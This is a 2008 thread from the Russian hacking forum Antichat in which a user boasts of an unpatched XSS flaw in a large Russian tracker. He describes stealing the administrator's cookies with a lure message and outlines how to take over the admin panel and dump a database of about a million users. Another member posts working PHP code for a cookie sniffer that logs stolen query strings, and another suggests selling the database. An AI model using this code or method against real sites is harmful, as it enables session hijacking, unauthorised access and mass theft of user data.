Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Xss в крупном Российском трекере |
17.07.2008, 15:06
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Xss в крупном Российском трекере
Пассивная XSS в крупнейшем Российском трекере (не торрентс)
За подробностями 643~770
---------------------------------------------------------------------------
Возможность слить БД (~1000000 пользователей) и получить доступ к Админ-Панели!
Последний раз редактировалось geforse; 17.07.2008 в 20:51..
|
|
|
17.07.2008, 15:10
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
Возможность слить БД
как ты через xxs бд будешь сливать?)
|
|
|
|
17.07.2008, 15:13
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
.Striker
Ну давай подумаем:
Код:
1. Получаем куки админа
2. Сразу идём в админку
3. Резервная копия БД
4. Начать копирование
Так более яснее ?
|
|
|
|
17.07.2008, 15:14
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
ты сначала получи куки и без палева слей её если получится 
а потом отпиши
если сайт крупный, то думаю тама за всем пасут |
|
|
|
17.07.2008, 15:18
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------
Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки
Сообщение от .Striker
если сайт крупный, то думаю тама за всем пасут
XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются
З.Ы. Плиз без флуда ( =
Последний раз редактировалось geforse; 17.07.2008 в 15:20..
|
|
|
|
17.07.2008, 15:22
|
|
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062
Репутация:
155
|
|
сниффер
<?php
$ip = getenv("REMOTE_ADDR");
$rhost = getenv("HTTP_REFERER");
$input = getenv("QUERY_STRING");
$date=(date("d.m.y"));
$time=(date("H:i"));
$fp = @fopen("snif.txt", "a");
@fputs($fp, "Дата: [ $date ] Время: [ $time ] IP: $ip Хост: $rhost Инфа $input \n");
@fclose($fp);
?>
|
|
|
|
17.07.2008, 15:24
|
|
Banned
Регистрация: 06.01.2008
Сообщений: 904
Провел на форуме:
4037638
Репутация:
1821
|
|
Сообщение от geforse
Доступ в админ панель я получал.
Банальное сообщение: "У вас тут плохо сайт работает"
Куки у меня и я админ!
-------------------------------------------------------------------
Сейчас снифер античатовский прост не работает))
У кого есть альтернативный, пишите, наделаю скринов бд, сайта и админки
XSS я обнаружил ~2 недели назад, ещё актуальна и закрывать повидимому не собираются
З.Ы. Плиз без флуда ( =
Чем не устроил сниффер от GreenBear?
|
|
|
|
17.07.2008, 15:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311
Репутация:
1676
|
|
Продавал бы тогда уж сразу бд
|
|
|
|
17.07.2008, 15:31
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
Сообщение от De-visible
Чем не устроил сниффер от GreenBear?
Я его и имел ввиду (XSS тестировалась именно на нём) {он сейчас не работает(}
Сообщение от Kaimi
Продавал бы тогда уж сразу бд
Что-то не хочется мне торговать БД ( =
-----------------------------------------------
Все предложения по поводу XSS в ПМ или ICQ
|
|
|
|
17.07.2008, 18:46
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме:
5365841
Репутация:
712
|
|
XSS в сообщении, выглядит так:  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
